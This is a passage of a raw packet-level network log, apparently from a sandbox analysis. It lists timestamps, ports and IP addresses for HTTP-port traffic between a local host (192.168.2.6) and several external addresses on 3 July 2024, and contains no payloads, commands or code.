Jul 3, 2024 18:08:47.095638990 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.095647097 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.095657110 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.095685005 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.100270987 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.100281954 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.100300074 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.100311041 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.100326061 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.100337982 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.105062962 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.105074883 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.105084896 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.105094910 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.105106115 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.105113983 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.105118036 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.105124950 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.105145931 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.105170012 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.109778881 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.109795094 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.109805107 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.109816074 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.109824896 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.109833002 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.109855890 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.109878063 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.114645004 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114656925 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114667892 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114679098 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114695072 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114696980 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.114706039 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114716053 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114718914 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.114726067 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114732981 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.114737988 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114748955 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114761114 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114763021 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.114772081 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114783049 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114789009 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.114799976 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114804029 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.114811897 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114820004 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.114823103 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114834070 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114845037 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114845037 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.114855051 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114866018 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114871025 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.114876986 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114885092 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.114887953 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114900112 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114903927 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.114909887 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.114931107 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.114945889 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.115147114 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115158081 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115171909 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115190983 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115194082 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.115200996 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115211964 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115216017 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.115222931 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115230083 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.115233898 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115246058 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115255117 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.115257025 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115267992 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115277052 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.115284920 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115298986 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.115314960 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115324020 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.115325928 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115335941 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115346909 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115358114 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.115358114 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115365028 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.115370035 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115381956 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115391970 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115396023 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.115402937 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115412951 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115418911 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.115422964 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115433931 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115434885 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.115444899 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115451097 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.115454912 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.115474939 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.115498066 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.116123915 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116136074 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116147995 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116163969 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116173983 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116187096 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.116188049 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.116189003 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116199970 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116209984 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116210938 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.116220951 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116231918 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116231918 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.116241932 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116251945 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116254091 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.116262913 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116274118 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.116274118 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116283894 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116288900 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.116295099 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116305113 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116309881 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.116316080 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116328001 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116338015 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.116338968 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116348982 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.116349936 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116360903 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116372108 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116375923 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.116383076 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116394043 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116399050 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.116406918 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.116436005 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.116925001 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116938114 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116947889 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116957903 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.116971970 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.116981030 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.117006063 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.117172003 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.117182970 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.117192984 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.117207050 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.117218018 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.117219925 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.117229939 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.117239952 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.117244005 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.117250919 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.117252111 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.117261887 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.117273092 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.117280006 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.117285013 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.117295980 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.117306948 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.117306948 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.117325068 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.117348909 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.139874935 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.139892101 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.139903069 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.139945984 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.139960051 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.139966965 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.139977932 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.139987946 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.140000105 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.140006065 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.140022039 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.140044928 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.140057087 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.140316963 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.172060966 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172105074 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172127962 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.172131062 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172163010 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.172194004 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172204971 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172211885 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.172215939 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172226906 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.172246933 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.172275066 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172317028 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.172420979 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172431946 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172442913 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172454119 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172463894 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172468901 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.172496080 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.172506094 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.172593117 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172604084 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172614098 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172638893 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.172661066 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.172676086 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172686100 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172718048 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.172750950 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172763109 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172772884 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172785044 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172795057 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.172796011 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172816992 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.172832012 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.172974110 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172983885 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.172995090 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.173005104 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.173012018 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.173021078 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.173027039 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.173032045 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.173043966 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.173054934 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:47.173055887 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.173069000 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:47.173094034 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:49.771850109 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:49.774169922 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:50.924002886 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:50.925621986 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:03.293322086 CEST	62922	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:03.847044945 CEST	80	62922	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:03.847273111 CEST	62922	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:03.847510099 CEST	62922	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:03.852965117 CEST	80	62922	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:04.534876108 CEST	80	62922	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:04.536295891 CEST	62922	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:04.536977053 CEST	62922	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:04.541801929 CEST	80	62922	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:04.752616882 CEST	80	62922	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:04.752736092 CEST	62922	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:04.755932093 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:04.762504101 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:04.762578964 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:04.762696981 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:04.767729044 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.482038021 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.482079983 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.482095957 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.482105017 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.482151985 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.482151985 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.482176065 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.482193947 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.482209921 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.482218981 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.482228994 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.482235909 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.482250929 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.482266903 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.482368946 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.482386112 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.482415915 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.482415915 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.482428074 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.482455015 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.487097979 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.487117052 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.487147093 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.487163067 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.599438906 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.599459887 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.599477053 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.599492073 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.599508047 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.599560022 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.599616051 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.599649906 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.599694014 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.599849939 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.599867105 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.599901915 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.599904060 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.599917889 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.599942923 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.599967003 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.600269079 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.600285053 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.600301981 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.600311041 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.600318909 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.600325108 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.600346088 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.600357056 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.600778103 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.600816011 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.600881100 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.600897074 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.600913048 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.600919962 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.600934029 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.600950956 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.600967884 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.600984097 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.601007938 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.601016045 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.601891994 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.601942062 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.601947069 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.601989031 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.604808092 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.604882002 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.690628052 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.690727949 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.690799952 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.690817118 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.690831900 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.690849066 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.690876007 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.724416971 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.724446058 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.724462032 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.724497080 CEST	62923	80	192.168.2.6	77.91.77.81
